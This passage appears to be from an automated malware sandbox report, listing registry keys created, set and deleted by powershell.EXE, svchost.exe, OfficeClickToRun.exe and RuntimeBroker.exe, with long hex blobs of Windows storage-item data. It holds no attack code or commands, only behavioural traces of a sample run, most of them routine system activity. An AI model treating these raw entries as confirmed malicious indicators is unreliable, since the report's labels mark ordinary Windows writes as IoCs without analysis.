\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-c3-b4-f3-a1-42\WpadDecision = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A0D9C39B-A4C2-4170-B0D8-23477E6024D5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-c3-b4-f3-a1-42 svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747689386" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-c3-b4-f3-a1-42\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000488e272103c9db01488e272103c9db01488e272103c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000346333363761373837653435653863303932356637336365613763343138653565386461666232353031643565666461326630396139323534353737393538630000b20009000400efbeb35aeba9b35aeba92e00000000000000000000000000000000000000000000000000b8c23e00340063003300360037006100370038003700650034003500650038006300300039003200350066003700330063006500610037006300340031003800650035006500380064006100660062003200350030003100640035006500660064006100320066003000390061003900320035003400350037003700390035003800630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34633336376137383765343565386330393235663733636561376334313865356538646166623235303164356566646132663039613932353435373739353863000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d56879d62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d56879d62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- = ac51fe2103c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001fed672103c9db014d3f362203c9db014d3f362203c9db0108cb0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000646564363062366538616135623137396539333132636361613739326635623663313863353239626462353532336233373665393934346437363863383437350000b20009000400efbeb35aeba9b35aeba92e000000000000000000000000000000000000000000000000005f866200640065006400360030006200360065003800610061003500620031003700390065003900330031003200630063006100610037003900320066003500620036006300310038006300350032003900620064006200350035003200330062003300370036006500390039003400340064003700360038006300380034003700350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64656436306236653861613562313739653933313263636161373932663562366331386335323962646235353233623337366539393434643736386338343735000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d5687ed62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d5687ed62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- = d4781b2103c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f2c8222103c9db01f2c8222103c9db01f2c8222103c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000366430633830363766396163376431313232613639366331303938396162616461373834353664336265633832333664636334316136613439373762643263310000b20009000400efbeb35aeba9b35aeba92e000000000000000000000000000000000000000000000000000e884300360064003000630038003000360037006600390061006300370064003100310032003200610036003900360063003100300039003800390061006200610064006100370038003400350036006400330062006500630038003200330036006400630063003400310061003600610034003900370037006200640032006300310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643063383036376639616337643131323261363936633130393839616261646137383435366433626563383233366463633431613661343937376264326331000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d56878d62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d56878d62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\b1f7ea5645e0dd8d96ad14dd6b470e9f01729817c174c333915df368649e3f60" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7498ea2d5d6c358a2231f197d793b32e460fcb350816ddf5566b62417f0d1c45" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e0eb78c-c95d-4bdc- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = 716f1d2203c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e0eb78c-c95d-4bdc- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009a8a652103c9db014a29612203c9db014a29612203c9db019ce108000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000346333363761373837653435653863303932356637336365613763343138653565386461666232353031643565666461326630396139323534353737393538630000b20009000400efbeb35aeba9b35aeba92e00000000000000000000000000000000000000000000000000b8c23e00340063003300360037006100370038003700650034003500650038006300300039003200350066003700330063006500610037006300340031003800650035006500380064006100660062003200350030003100640035006500660064006100320066003000390061003900320035003400350037003700390035003800630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34633336376137383765343565386330393235663733636561376334313865356538646166623235303164356566646132663039613932353435373739353863000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bb